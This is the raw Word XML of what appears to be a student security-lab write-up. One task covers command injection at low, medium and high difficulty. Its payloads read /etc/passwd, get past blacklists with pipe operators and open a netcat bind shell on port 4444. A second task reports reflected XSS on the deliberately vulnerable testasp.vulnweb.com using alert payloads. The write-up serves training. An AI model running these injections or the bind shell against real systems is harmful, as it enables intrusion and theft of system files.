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D112A" w14:textId="7332C9D4" w:rsidR="00805E29" w:rsidRDefault="00805E29" w:rsidP="00215EB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  <w:r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 xml:space="preserve">Task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r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>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9C7CC" w14:textId="0557B510" w:rsidR="00805E29" w:rsidRDefault="00805E29" w:rsidP="00215EB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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="3C3B37"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:eastAsia="en-IN" w:bidi="gu-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C9E348" wp14:editId="4B6BE761">
            <wp:extent cx="5731510" cy="3101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5087" w14:textId="77777777" w:rsidR="00805E29" w:rsidRDefault="00805E29" w:rsidP="00215EB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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3A65FD78" w14:textId="77777777" w:rsidR="00805E29" w:rsidRDefault="00805E29" w:rsidP="00215EB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</w:p>
    <w:p w14:paraId="6BA67918" w14:textId="0A45BB3D" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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 xml:space="preserve">Command Injection </w:t>
      </w:r>
      <w:r w:rsidR="008D0625"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>(Task 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C807A4A" w14:textId="4CD6FF66" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E04A5E" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1291B7C4" w14:textId="09E750E5" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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Low</w:t>
      </w:r>
      <w:r w:rsidR="00147BF8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 xml:space="preserve"> severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4395D8" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRP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Underlying code does not check if $target matches an IP Address. No filtering on special characters.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;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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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in</w:t>
      </w:r>
      <w:proofErr w:type="gram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Unix/Linux allows for commands to be separated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD86FC9" w14:textId="0E8F94DF" w:rsidR="00215EB3" w:rsidRP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192.168.0.1; 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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00147BF8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- Prints working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4556A7" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRP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lastRenderedPageBreak/>
        <w:t>192.168.0.1; cat /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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 | tee /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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spell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- Displays the contents of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/etc/passwd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on the webpage and also copies the contents of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/etc/passwd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file to the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/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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spell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directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19F60B" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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 xml:space="preserve">Alternatives </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00215EB3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to </w:t>
      </w:r>
      <w:r w:rsidRPr="00215EB3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="B35A1B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DEDFE0" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E00F8BD" w14:textId="39ED88E1" w:rsid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&amp;&amp;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- AND Operator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br/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|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- PIPE Operator - Completely removes IP address from output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8E86B" w14:textId="32E9320E" w:rsid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37320D1E" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRP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56531DFC" w14:textId="1DA0F84E" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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Medium</w:t>
      </w:r>
      <w:r w:rsidR="00147BF8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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00147BF8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severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB236A5" w14:textId="43627EF5" w:rsid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Viewing source code, we see that a blacklist has been set to exclude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&amp;&amp;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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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and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;</w:t>
      </w:r>
      <w:proofErr w:type="gram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. As noted above, we can use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|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as a replacement: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br/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192.168.0.1| cat /etc/passwd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. Double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||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can also be used, as shown below</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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:</w:t>
      </w:r>
      <w:proofErr w:type="gram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br/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br/>
        <w:t>Can also use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| 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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spell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or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|| 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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spell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 (no need to include the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip</w:t>
      </w:r>
      <w:proofErr w:type="spell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address.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51F506" w14:textId="4C31D972" w:rsid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2F6FC467" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRP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48E73993" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699889E0" w14:textId="34AD66CE" w:rsidR="00215EB3" w:rsidRP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Viewing source code, more extensive blacklist has been set. Slightly trickier, however the answer is in the view source -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br/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'| ' =&gt; '',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- note that there is a space after the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|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character. If we try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| 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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spell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, no output is returned, however if we use </w:t>
      </w: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|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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spell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we are including our command within this space, as shown below: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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE4F89" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E0999" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRDefault="00215EB3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192.168.0.1; /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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/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pipe</w:t>
      </w:r>
      <w:proofErr w:type="gram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;sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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 /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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/pipe | 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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 -l 4444 &gt; /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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/pipe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 - Creates a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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listener, then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00215EB3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 192.168.0.1 4444</w:t>
      </w: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to connect. (Change IP addresses to match those of target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4DB297" w14:textId="77777777" w:rsidR="00147BF8" w:rsidRDefault="00147BF8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6EC94F2D" w14:textId="77777777" w:rsidR="00147BF8" w:rsidRPr="00215EB3" w:rsidRDefault="00147BF8" w:rsidP="00215E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3872E95B" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB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Points to note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F196F" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB3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Ensure you are using commands specific to the target you are trying to attack, all of the above are Linux, Windows commands will be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F74D7" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRPr="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB3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Try commands with and without a space between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A23AD1" w14:textId="77777777" w:rsidR="00215EB3" w:rsidRDefault="00215EB3" w:rsidP="00215EB3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215EB3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lastRenderedPageBreak/>
        <w:t>You will not always have access to the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AE09F" w14:textId="77777777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285819BE" w14:textId="77777777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56E049AA" w14:textId="6EBE9074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8D0625">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3C3B37"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D0625">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3C3B37"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D0625">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3C3B37"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0625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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F8CD8" w14:textId="4758FB0A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Title :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B069A" w14:textId="0E130079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Domain :-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA39835" w14:textId="1F52388C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Subdomain :-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 testasp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05E5EC" w14:textId="77777777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305013F9" w14:textId="27904C80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Steps to </w:t>
      </w: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reproduce :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B1B0B61" w14:textId="7B5DA7D4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Step </w:t>
      </w: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1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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- Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003F3C37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http://testasp.vulnweb.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65D3902E" w14:textId="3AB75717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Step </w:t>
      </w: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2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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- On the top menu you will find a search option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC78E9" w14:textId="58C05B6C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Step </w:t>
      </w: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3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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- Click on it and you will be prompted with the search box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9EE1B" w14:textId="5C8CD289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Step </w:t>
      </w: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4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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- Intercept the request in the </w:t>
      </w:r>
      <w:proofErr w:type="spell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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6680215D" w14:textId="6B945D92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Step </w:t>
      </w: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5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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- Payload used :-&lt;script&gt;alert(1)&lt;/script&gt; or &lt;script&gt;prompt(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06062D04" w14:textId="17582471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Or you can find any other payload available at </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2F056A" w14:textId="3ABEC98B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8" w:history="1">
        <w:r w:rsidRPr="003F3C37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https://github.com/payloadbox/xss-payload-list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33A46C25" w14:textId="2F11FEE8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 xml:space="preserve">Proof </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D59DC2" w14:textId="6D196822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3C3B37"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN" w:bidi="gu-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BCDC10" wp14:editId="58BA431A">
            <wp:extent cx="5731510" cy="2596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DA8C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6FEBE08F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4712B487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7CAD12FC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16BE45E2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1C8BBE27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380AA9D9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0C22AED8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299A531C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20732D52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23ACB721" w14:textId="555478D1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Photo proof 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4FEBAD" w14:textId="55F0086F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3C3B37"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN" w:bidi="gu-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74806090" wp14:editId="5344B681">
            <wp:extent cx="5731510" cy="389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5596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3E46618A" w14:textId="606CEFC8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Video demonstration link:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37B801" w14:textId="2F656B95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805E2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https://drive.google.com/file/d/1Eph7Df-DzOw94bOVeUSfl3DUcjzGgP6D/view?usp=sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18C353" w14:textId="77777777" w:rsidR="00805E29" w:rsidRDefault="00805E29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4B16220B" w14:textId="6DE387C8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21DC1E62" w14:textId="77777777" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="225" w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14866D32" w14:textId="77777777" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">With user interaction, an attacker could execute arbitrary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t xml:space="preserve"> code in a victim's browser. This would allow an attacker to unwillingly make a victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417D79B" w14:textId="77777777" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="255"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>Perform any action in the identified endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A456E" w14:textId="6CC635A5" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="255"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>Cookie stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B710E1" w14:textId="77777777" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="255"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>View any information that the user is able to view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F4ABA" w14:textId="77777777" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="255"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>Modify any information that the user is able to modify (not sure if applicable in this case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B283E1" w14:textId="77777777" w:rsidR="008D0625" w:rsidRDefault="008D0625" w:rsidP="008D0625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="255"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
        </w:rPr>
        <w:t>Interact with other application users as if it were him - impersonation (not sure if applicable in this case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCE37D" w14:textId="77777777" w:rsid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35D6A1B3" w14:textId="77777777" w:rsidR="008D0625" w:rsidRPr="008D0625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7576EF13" w14:textId="77777777" w:rsidR="008D0625" w:rsidRPr="00215EB3" w:rsidRDefault="008D0625" w:rsidP="008D062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01C1F9FC" w14:textId="77777777" w:rsidR="00A56779" w:rsidRDefault="00A56779"/>
    <w:sectPr w:rsidR="00A5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8157F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B45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22484B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="761E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6C"/>
    <w:rsid w:val="00147BF8"/>
    <w:rsid w:val="00215EB3"/>
    <w:rsid w:val="00805E29"/>
    <w:rsid w:val="008D0625"/>
    <w:rsid w:val="009F596C"/>
    <w:rsid w:val="00A5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2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15E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5EB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5E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06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62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15E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5EB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5E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06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62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yloadbox/xss-payload-li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stasp.vulnwe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Windows User</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-26T13:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-07T13:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>